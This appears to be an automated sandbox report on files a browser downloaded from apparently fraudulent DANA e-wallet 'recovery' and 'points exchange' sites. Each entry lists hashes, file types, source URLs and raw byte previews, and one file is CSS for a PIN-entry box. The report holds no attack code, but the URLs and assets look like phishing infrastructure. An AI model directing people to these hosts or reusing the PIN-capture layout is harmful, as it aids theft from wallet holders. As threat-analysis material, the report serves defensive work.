                                                                                                                            Preview:GIF89aW.......}........k..........................................................................}........o.... .."u.$..&s.&..+..-../r./}.0..1..3..5..9..<r.=..=..>y.@..A..Hx.I~.J..J..N..N..O..O..T..T..U..W..X..Yx.Y~.[..[..]..`..a..e..f..f..i..i..k..l..l..n..p..s..s..u..u..v..v..w.|..}xz................{..................................................................................................................................................................................U..L..O..f..f..f.....a..e. . "Ic$$&'Pg+)+,/1-L\-f......0.Th/-///30./6-'>=>?Zl@NW@WfBUbBVbBWbC.`GV`G[iHFHHNRO.zQIHZfo\[\c.fB.f.m.{xec~ua.^m.e.R..]].a.>U.qy...,.N...j..l>.v.....5C........Q..9........>..>..`........P..?....x.........7........e...................................!..NETSCAPE2.0.....!. Cropped with ezgif.com GIF maker.!.......,....W.......'..H......*\.p!...%H......3j.... ?N.h..H.!.....`.._V.......F<....@.j\)...H.*.y.e..B..t..i....*%....`{.......i.}..g.d]V.it..w....T'B.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 480 x 118, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):10588
                                                                                                                            Entropy (8bit):7.920893955198491
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:M6+HXQMbqmgEy9n5LzCldeYK61VX+oqwckpZ7QSYQv/95F9aWfwNpkcRe/:M6gzb7g79nUHeYK6fJn7MSYU/9JPwNe5
                                                                                                                            MD5:3DC459976E4F7086419105435A80FC25
                                                                                                                            SHA1:4A79A70AE98BE7B6386DDDE8609D83EEE4777373
                                                                                                                            SHA-256:8AF7F1691E018BFC400432DFC61455F26F63226AB369E675C80CEF5A93334E87
                                                                                                                            SHA-512:E83D13B741E2C2E5AC38CB498485EB8C0E7D31E6D182DEB8A9AE54A3F306C301FC984AE6BC353142AC1FF7531B8C4A7E21D6711C23DD5F548EF38300208021C2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/dana_text.png
                                                                                                                            Preview:.PNG........IHDR.......v.......@.....sRGB.........sBIT....|.d... .IDATx..{x.W}...h...m.b;..!.Sn.!@. ?.f..u.>.ko.%.t..R..h...m...]Z.Xd...r.bq)-."..N.+..e.dY.......w..d.y.}5..<zlI.....=.....p8.....p8.....p8.....p8....orr2Gr.S.6...W.*~w.kW....dnll,K..d.d..GR...+.R..s....~..y.If...'O.l#....N.8........R.......W.f.Y.....099...#G.d..<...;...@2.....^..8q.D+.*y.........@,.,P/..f.....T.;..*7 r.}0...s"..U?;..._...T.?..oU..@....Y.y.......)...8..>?44T.gO.Fc....o.}..Z.l....j.[.l....L2+"-.R..$."R.Z/..WJ=.....yG....;..JUs..CHz....|[kk.f...v..+`.@.f...L.<.E.Y.....1...~.3......n....i..........5`..[)...*.*.@... O. ".0......R.(..8.`.@AD.:.....f.....wgV.qV..dYDN.....A.|........*...l.FH.......l..{...v.y........M..3+sD.(...pLk.e...N.>=.q..%..X[.'.....x}}}..................BP.u)..@..q.GE.~...p.@1.&pkD}......d.......0s....E$.s...>...k.3"r...........X......8v.X...s}... ..A...T*...L.Kv...1.. y...<Nr....Z..i...A.|.........z.F.B..d...w.|..8..9@R.<E.(.{K.....$W..s
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):211
                                                                                                                            Entropy (8bit):5.008692902780752
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:tI9mc4slnJ/sG0qQOF9r0mqZlllVvI4/jEHGB3Hb:t4rEnqh/0hlllF9gHU3Hb
                                                                                                                            MD5:3CC32EC8449360AFADF16AB753D364FE
                                                                                                                            SHA1:AA001F399AB0F83378EF8B1AD1986060C64E3C74
                                                                                                                            SHA-256:CE2DC5E5066AFAA335FD98C55228E4C074451DB5F60FE5A652C8F7029D6BF4FB
                                                                                                                            SHA-512:FABCCBC761A20CD34A1A8B7A5BD5546F29F13A2DBDA175F7C925DE496C338B9BC5CD0F79B7F08830DE1D8814C4467B877C1E33A8B8BF615A4A3AE04E71002BE2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" class="ionicon" viewBox="0 0 512 512"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="48" d="M328 112L184 256l144 144" class="ionicon-fill-none"/></svg>
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (666), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):666
                                                                                                                            Entropy (8bit):4.8232470526080675
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:rf6bR+03vJdVlubBtKO+gvSovJdVtsX21ZmuEq6bK6JEtIF+5cdRXv0bZFXA:g/3VCBVAe3Vts4KdxHddRYFw
                                                                                                                            MD5:F04C34E455649C317CBFE449A7C5B10E
                                                                                                                            SHA1:07C192CD6C0D6B6A96DDD3FE56FFC5762C2F6EB7
                                                                                                                            SHA-256:963EE000EA25A124A63E7DD4DED8A9ADC4D3501DE7D0BF47F78F6FA4BC4EE472
                                                                                                                            SHA-512:D0948E109DAB5A9AB5A6E3D02C1896A0EA64FE683EC5036EA148E3E649D1B86794234551B33C8CE573035F77CFDC5209DA966EC087D835A794454F285D1811E6
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/pin.css
                                                                                                                            Preview:.box-input-pin {width: 100%;height: 45px;margin-top: 50px;display: flex;justify-content: center;align-items: center;}.box-input-pin input {height: 100%;width: 40px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;justify-content: center;align-items: center;text-align: center;font-size: 18px;font-weight: 700;color: #000;}.box-input-pin .clear {position: absolute;width: 100%;height: 100%;z-index: 99;}.show {margin-top: 30px;width: 105px;height: 25px;outline: none;border: 1px solid #fff;background: none;border-radius: 40px;font-size: 12px;text-align: center;}.forgot {margin-top: 50px;font-size: 15px;font-weight: 600;text-align: center;}
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):8484
                                                                                                                            Entropy (8bit):7.924229044420093
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:ZC238elt8IjGXdEaokt/9MmhXAHm2yPfBJbA7nXAZVGMGQC2:sg/lt88Gttf7XAmzPXADWGo
                                                                                                                            MD5:74ADB66E545A68DF7E5A0442A02FA8E7
                                                                                                                            SHA1:A1692D3BFBDE3C0CB3A8BC9B9B1FB2DE4D570E85
                                                                                                                            SHA-256:4285DB40C51CC53230CAB0490DF40566E285B48FB2B2E4729B42FF2A26C74480
                                                                                                                            SHA-512:44FFC291A4790B3F0CC6F78CC170F882975A7902BC14035F8108D28CBF304034553E2AB5BD4BD1D7D2BF78F8EF31EDA4ADBB89A66604B56B610D2908F338F8CE
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR..............X......sRGB.........sBIT....|.d... .IDATx..{.%uu.....y...o.)2....x..A4..Dc.....WM.E.....d-....jn...L..(H@...&....Z....4.=.>U.{...._WW.SuN.Su....f...c.~.~....b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,..eA#E......8....5.J."....%.H..W.............o./...&H.......FT.#y?.S.~f.%../!....S!R.$o...;..2.,p.....\.B.CI>@....c.......x3...........-L..M/..H.&...,/Z.V!...._<f...#E..-X.I..K.....-K...p..l+Z..c.$....V..-K...p....-HYq...L...`..C9.`..QU}".cY"X..@...$.......D.h.J...)....122.z.e....-KY 9,"..n..mAH^.l...1..Y.`/...-K.Xp-H......hY...]"r.B^?YP-....x....9..;88..hY.b.(......l5[.Y.j...s..........................)...pv.r.#n....-D....B.a.'.-G...`3._.x..N.;&&&.........t.R.~...P........8JUOv..e........"..x....B...G.-G. y..|ydd......`.o..W....8LD.}.</....N*Z.. .).7......,..Z..yC.nt.rx......Y..+..<.Z.g.-G.(|.........l..g.u}..Z.V..x...$..........V.........h;d.t..g...k..".,..%.^.O..T..j ..).....{..7......a.9...]Gr..lI%.).o.....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=3, software=Google], baseline, precision 8, 599x237, components 3
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):56391
                                                                                                                            Entropy (8bit):7.959513276384216
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:+Pkk3TWjxywumWWWSk/lOe2eLruw1oDJ6w:+P3StRWjOhYrDRw
                                                                                                                            MD5:5ECB3BCB8068110C5C44A096BA43CB77
                                                                                                                            SHA1:E4E215BAACBB74B21A31914CB82AEA083C56685B
                                                                                                                            SHA-256:ED8E7414B2E1883D3D618F6B6AB5D2B100734EDAC00CD5A1ED3A278C745053A1
                                                                                                                            SHA-512:1F3529A6D7D403346FBB63DAD4321149FBB9C5BD49C44B288CEC5D7836D6AE6FE1FD7E0BC54891475E1DCFD003C8BE440DE0C75D49882A7DD612DB0519E051CF
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpg
                                                                                                                            Preview:......JFIF.............lExif..II*.......1.......2...............i.......:.......Google............0220........W......................(ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......trXYZ...d....gXYZ...x....bXYZ........rTRC.......(gTRC.......(bTRC.......(wtpt........cprt.......<mluc............enUS...X.....s.R.G.B................................................................................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........para..........ff......Y.......[........XYZ ...............-mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C.........................................................................W.."...........................................T...........................!..1"AQ..a.....2Rqr....#BCb....Sc...3.$%&'..47..(6E.......................................W....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):16
                                                                                                                            Entropy (8bit):3.625
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HBhR:hhR
                                                                                                                            MD5:520001C6126721775414D68A2D7E965F
                                                                                                                            SHA1:19FF7D757B18B65505A1D1A1A40446784248A9AF
                                                                                                                            SHA-256:00ACD94A76ABB85290211485908FD461CAB1E7FD8F7925F7753108CC04BB36E7
                                                                                                                            SHA-512:D3C3AE8768EAB57D433D68E9794B29D5E83D4632EB4C225A514429414CE459BF8DD2CCECB51F883429010922081DCCF4A8B562D78CA84905471705FE004A35CC
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAn6pKFbghTcHRIFDRAIhME=?alt=proto
                                                                                                                            Preview:CgkKBw0QCITBGgA=
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (4141), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):4141
                                                                                                                            Entropy (8bit):5.192518445216259
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:s4Fv5JG4pAMWlBz5YTmOv2SONaCav9pWMLnZVIrzR/LzVAdoqCWqCsqDnq0Yq44q:s4h5JG4ylBzqTXv2LNaHv9pWKWrV/3VJ
                                                                                                                            MD5:5305C9D6890ECF4E37E6828920544483
                                                                                                                            SHA1:1C0B2C47E127227005C0048C73D103490B2C5D25
                                                                                                                            SHA-256:A1ABB9748933534D9EBA6BE132C72C9846321F9AA6B063D5B51870299B71F0B3
                                                                                                                            SHA-512:FA7FCB4C373B912028624BF92812020187CF2ED4F64CE9DC126E91556290CCD41C8C4158EFD5305064CAFD304C986189ECF24E6E11289D87515509ECC8F5122F
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.js
                                                                                                                            Preview:import{r as o,h as i,H as t,a as n}from"./p-d15ec307.js";import{i as s,b as r,g as e,c,d as a}from"./p-40ae2aa7.js";const l=o=>{if(1===o.nodeType){if("script"===o.nodeName.toLowerCase())return!1;for(let i=0;i<o.attributes.length;i++){const t=o.attributes[i].name;if(s(t)&&0===t.toLowerCase().indexOf("on"))return!1}for(let i=0;i<o.childNodes.length;i++)if(!l(o.childNodes[i]))return!1}return!0},h=new Map,d=new Map;let f;const m=class{constructor(i){o(this,i),this.iconName=null,this.inheritedAttributes={},this.isVisible=!1,this.mode=u(),this.lazy=!1,this.sanitize=!0}componentWillLoad(){this.inheritedAttributes=r(this.el,["aria-label"])}connectedCallback(){this.waitUntilVisible(this.el,"50px",(()=>{this.isVisible=!0,this.loadIcon()}))}disconnectedCallback(){this.io&&(this.io.disconnect(),this.io=void 0)}waitUntilVisible(o,i,t){if(this.lazy&&"undefined"!=typeof window&&window.IntersectionObserver){const n=this.io=new window.IntersectionObserver((o=>{o[0].isIntersecting&&(n.disconnect(),this.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 600 x 947
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1382333
                                                                                                                            Entropy (8bit):7.884817825386048
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:Fa2SEI3n5NFnU9k0FY0/mRLIrQldFepVXjCswLLZrp6gX7w2:F1un5YdK5vFaVX0mR2
                                                                                                                            MD5:4A67A67A0D4666B0DA5807C65C3F09C3
                                                                                                                            SHA1:B6DC767BCA35BF211D8D2298E6C8664EEBDD5F84
                                                                                                                            SHA-256:2E3A81133F893DFB5FC3F7D52E02FB7C193F68BFB61696DC5076C947BD4EA8F0
                                                                                                                            SHA-512:535CB7583445C7B43B6038CF74962B686783066F06EA867ECE0DE831E0EA11B131EC6D0FD675AAC5E67E05B5647F646DCD0D270272A93F35A3267767580BABA6
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:GIF89aX.......L..}....."R.5..}.....X.........9..A..6.g..............................................................R.................y.............. /....".....{.._....... +6 m. x. ~.!.."..$n.%..&..'..)17*/v,../}.1..46:4Pg7z.7..7..8HT9..<..?..@]sB..C..D..FKVIx.J^jKblK..LbmLbnL~.M^jM^rMcpM..M..M..OblOq.Sp.U..YMVY..[^c_..a..b..d..d..f..i..j..k|.n..plzs..vY.z..z..{..............................................................................................................................................................................................................................i..,..N...%&,%-.((+)1.,*,-.0.../-//./9,$=*!OD.R;.oE.p[.6O.h.....e}.uH.?{.~#.X..9..`.0..E.!).AU..'..U.. .D..&..!........C..e...P..z.u..|y.Y.dZ.....h.......Sy....HN....^..f_.{w!..NETSCAPE2.0.....!. Cropped with ezgif.com GIF maker.!.......,....X.......A..H......*\.a...#".@....3Z..!....B..x....&..\...0c..@..M.2s6.yB..<.....B..H.*].2...=..I...X......`...y.gA. .XX.. .Ly.$...X.r?..x!..
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5078
                                                                                                                            Entropy (8bit):7.9162479598001845
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:SlG0ml1KICtII+3ok+yNdfBPA00KFY14dooNVO+3RrSGo2XR+nPRtu7MrprxeA12:iGrkIPYk+yNl0K+142+ZSpEEnPYM9xe3
                                                                                                                            MD5:E8E4E4432355A07040A7327673850223
                                                                                                                            SHA1:B07F6CFAACB6A2093778B08DD8D9B8F7D718C119
                                                                                                                            SHA-256:50B4BAD00572D07C6158459A5CB93B1B3F9BDEA95D393AA56970AFDED2F58913
                                                                                                                            SHA-512:7A88F02C1B3A28D852476219C80A3C5493FDC94339B19B3A2FC2C6F9EC9A8661636CD26E43CEC0A601B668AC1C5F02D3965832F89E76E4574953860EB945C636
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR..............Qf.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME...............IDATx...{....ZzQ...Z; .C.m.x.m.../.x..?;6Nf..N....v...m..$..!.[.VWW..u.....kU.....R.{..t...U.O...>4.0...'..8.(R....%......I..$.q...]$H.B...E..I.M6...l.M..P..$..!.0S...L3F?I,..D....|U.U.;.p.@.',.G,.B.....A.(TX.g..y..Ls...0pI1....^..x8..b.e......p;...!.BE.)^.....I..N..{..p.|b....s.0.*.N2..m..*.p...".$101(aV...00..`.b...fL.[...<\\ .0.^`.9.2...4...Y..L....@.8.&...1E..pq.%...l.e..r..E....).H..&I..66...>...e.;....2L$.*d..:W...B.-.a.[......s..e."%.*....$F....c.12....?..<.6.g.......8..).Hp..\..P*.q,\.,.#...?3.Fp.[...... .0cd.....!...:.....X,l...4Y.W....`...M...3..kn.j...x.M>5.`.c......6s..|9.i.......5>.E..[.'.<3|..|.Z...EM7#<...X.....X.G....P.Q<.u>.<)../b..y...........f..L.....a...._m.C*..+|.y.... ....?.-.!.E.-i.y.QR.G*uK.G.e..:.-Y...J........1........jf...>N0I.*......./.W.6..U=.\...S..[|...-.!.R...c......-.y.G....e.b..
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 80 x 45, 8-bit colormap, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):741
                                                                                                                            Entropy (8bit):6.2179187268012095
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:6v/7FXUCU55555555555555555555555M1uivQS8H9h+6eIbkekqhLzSUFEMb+zM:TCU55555555555555555555555Gv9zIj
                                                                                                                            MD5:C15C95B8DB17F44E5826BB7839278578
                                                                                                                            SHA1:5BE0AB5ABA6201A0A3A3423F9DB8008ED2385430
                                                                                                                            SHA-256:AF52BFB0AB7606D185DB1457DDC3EDCEB61C7FE9675E099CAE3E3BE1ECCF152C
                                                                                                                            SHA-512:965183A95CD3356BBEF2BA468A44EFD36E503967F19E797505DB4560846F52C386E8B8221BBC11DA9DE96A02A799B4074222AF7022BC54FAC55F32989C5385B4
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...P...-......s......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.............................................................................................................................................................................................. .............+..}...=tRNS.......]....Z.)....&...."........".....&......U.....R....|....bKGDCg..b....tIME.....*.........IDATH......P...+|$z.N...5....(c..c..;.8@,.J.V&2....x.X.5.].8.8.....7.h.y...,.....J(..;..dx..E.7...J(.=...`..Fcx.)...P.....[.o...R....."...M...d..".....%tEXtdate:create.2022-10-29T04:40:52+00:00...t...%tEXtdate:modify.2022-10-29T04:40:52+00:00.......(tEXtdate:timestamp.2022-10-29T04:42:19+00:00E..*....IEND.B`.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 600 x 947
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):1382333
                                                                                                                            Entropy (8bit):7.884817825386048
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:Fa2SEI3n5NFnU9k0FY0/mRLIrQldFepVXjCswLLZrp6gX7w2:F1un5YdK5vFaVX0mR2
                                                                                                                            MD5:4A67A67A0D4666B0DA5807C65C3F09C3
                                                                                                                            SHA1:B6DC767BCA35BF211D8D2298E6C8664EEBDD5F84
                                                                                                                            SHA-256:2E3A81133F893DFB5FC3F7D52E02FB7C193F68BFB61696DC5076C947BD4EA8F0
                                                                                                                            SHA-512:535CB7583445C7B43B6038CF74962B686783066F06EA867ECE0DE831E0EA11B131EC6D0FD675AAC5E67E05B5647F646DCD0D270272A93F35A3267767580BABA6
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif
                                                                                                                            Preview:GIF89aX.......L..}....."R.5..}.....X.........9..A..6.g..............................................................R.................y.............. /....".....{.._....... +6 m. x. ~.!.."..$n.%..&..'..)17*/v,../}.1..46:4Pg7z.7..7..8HT9..<..?..@]sB..C..D..FKVIx.J^jKblK..LbmLbnL~.M^jM^rMcpM..M..M..OblOq.Sp.U..YMVY..[^c_..a..b..d..d..f..i..j..k|.n..plzs..vY.z..z..{..............................................................................................................................................................................................................................i..,..N...%&,%-.((+)1.,*,-.0.../-//./9,$=*!OD.R;.oE.p[.6O.h.....e}.uH.?{.~#.X..9..`.0..E.!).AU..'..U.. .D..&..!........C..e...P..z.u..|y.Y.dZ.....h.......Sy....HN....^..f_.{w!..NETSCAPE2.0.....!. Cropped with ezgif.com GIF maker.!.......,....X.......A..H......*\.a...#".@....3Z..!....B..x....&..\...0c..@..M.2s6.yB..<.....B..H.*].2...=..I...X......`...y.gA. .XX.. .Ly.$...X.r?..x!..
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=3, software=Google], baseline, precision 8, 599x237, components 3
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):56391
                                                                                                                            Entropy (8bit):7.959513276384216
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:+Pkk3TWjxywumWWWSk/lOe2eLruw1oDJ6w:+P3StRWjOhYrDRw
                                                                                                                            MD5:5ECB3BCB8068110C5C44A096BA43CB77
                                                                                                                            SHA1:E4E215BAACBB74B21A31914CB82AEA083C56685B
                                                                                                                            SHA-256:ED8E7414B2E1883D3D618F6B6AB5D2B100734EDAC00CD5A1ED3A278C745053A1
                                                                                                                            SHA-512:1F3529A6D7D403346FBB63DAD4321149FBB9C5BD49C44B288CEC5D7836D6AE6FE1FD7E0BC54891475E1DCFD003C8BE440DE0C75D49882A7DD612DB0519E051CF
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:......JFIF.............lExif..II*.......1.......2...............i.......:.......Google............0220........W......................(ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......trXYZ...d....gXYZ...x....bXYZ........rTRC.......(gTRC.......(bTRC.......(wtpt........cprt.......<mluc............enUS...X.....s.R.G.B................................................................................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........para..........ff......Y.......[........XYZ ...............-mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C.........................................................................W.."...........................................T...........................!..1"AQ..a.....2Rqr....#BCb....Sc...3.$%&'..47..(6E.......................................W....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):5078
                                                                                                                            Entropy (8bit):7.9162479598001845
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:SlG0ml1KICtII+3ok+yNdfBPA00KFY14dooNVO+3RrSGo2XR+nPRtu7MrprxeA12:iGrkIPYk+yNl0K+142+ZSpEEnPYM9xe3
                                                                                                                            MD5:E8E4E4432355A07040A7327673850223
                                                                                                                            SHA1:B07F6CFAACB6A2093778B08DD8D9B8F7D718C119
                                                                                                                            SHA-256:50B4BAD00572D07C6158459A5CB93B1B3F9BDEA95D393AA56970AFDED2F58913
                                                                                                                            SHA-512:7A88F02C1B3A28D852476219C80A3C5493FDC94339B19B3A2FC2C6F9EC9A8661636CD26E43CEC0A601B668AC1C5F02D3965832F89E76E4574953860EB945C636
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/img/load_spin.png
                                                                                                                            Preview:.PNG........IHDR..............Qf.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME...............IDATx...{....ZzQ...Z; .C.m.x.m.../.x..?;6Nf..N....v...m..$..!.[.VWW..u.....kU.....R.{..t...U.O...>4.0...'..8.(R....%......I..$.q...]$H.B...E..I.M6...l.M..P..$..!.0S...L3F?I,..D....|U.U.;.p.@.',.G,.B.....A.(TX.g..y..Ls...0pI1....^..x8..b.e......p;...!.BE.)^.....I..N..{..p.|b....s.0.*.N2..m..*.p...".$101(aV...00..`.b...fL.[...<\\ .0.^`.9.2...4...Y..L....@.8.&...1E..pq.%...l.e..r..E....).H..&I..66...>...e.;....2L$.*d..:W...B.-.a.[......s..e."%.*....$F....c.12....?..<.6.g.......8..).Hp..\..P*.q,\.,.#...?3.Fp.[...... .0cd.....!...:.....X,l...4Y.W....`...M...3..kn.j...x.M>5.`.c......6s..|9.i.......5>.E..[.'.<3|..|.Z...EM7#<...X.....X.G....P.Q<.u>.<)../b..y...........f..L.....a...._m.C*..+|.y.... ....?.-.!.E.-i.y.QR.G*uK.G.e..:.-Y...J........1........jf...>N0I.*......./.W.6..U=.\...S..[|...-.!.R...c......-.y.G....e.b..
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):140
                                                                                                                            Entropy (8bit):4.939494840814972
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HBhWKTJoAwtTkdpthO+kxhRNPDhHIJ8pp5NoUrW/:hhWsq4ptM+g3dtoJ8p3qUrW/
                                                                                                                            MD5:1B733F7BABBA4E1EF133FC8F7E44D8F1
                                                                                                                            SHA1:A79BECA7853605E766F30165D13E7F57959E3201
                                                                                                                            SHA-256:7105621C3367E7C440C68DD555A86688DCE0AE0341F2775B37D23A2142FDAB60
                                                                                                                            SHA-512:BA5A8959A440896C1800E5E2BD79EE6D9FCE2405E9E750FA1472AD36B290792AAADDDEA6FF7921BD3A0D53C513131F923A057171C14122899F8EF57C37ADE6A5
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAn6pKFbghTcHRIFDRAIhMESMwmjcKHchcejRBIFDR6dICMSBQ1iprDeEgUNTjE4MRIFDWegdasSBQ1fK4b_EgUNXN984RIlCVTx8fKDQPv4EgUN3mmdXRIFDR2xUC0SBQ0AjZ7TEgUND7ggpg==?alt=proto
                                                                                                                            Preview:CgkKBw0QCITBGgAKNgoHDR6dICMaAAoHDWKmsN4aAAoHDU4xODEaAAoHDWegdasaAAoHDV8rhv8aAAoHDVzffOEaAAokCgcN3mmdXRoACgcNHbFQLRoACgcNAI2e0xoACgcND7ggphoA
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):7863
                                                                                                                            Entropy (8bit):7.944853026641418
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Oxyj5jciyprh/k6wSpBFcrApNmH58Byn7w3tdZvdsqVhwN5RxADRPtkch:OxsjQpSIFaAqH58Byn7wZvdZVc5R4vFh
                                                                                                                            MD5:BF1D4A90DE7E29B2BE55237982CB30B4
                                                                                                                            SHA1:EF942049631B598767FDA52D54458B9F9680EE87
                                                                                                                            SHA-256:46518758F002D85CFF9220609163F23B7E9F8F2721561D1E0BA79C4F17425C58
                                                                                                                            SHA-512:3AC1AB4324711A94DDD9F5BC24D5E2CB3948073602AD5E52F0B2C7B61C1DF072ACA6FB9E015DA9E113071A353F7B7E1493EB7F2C9CDBBB6417938FAB17909B09
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/img/load_bg.png
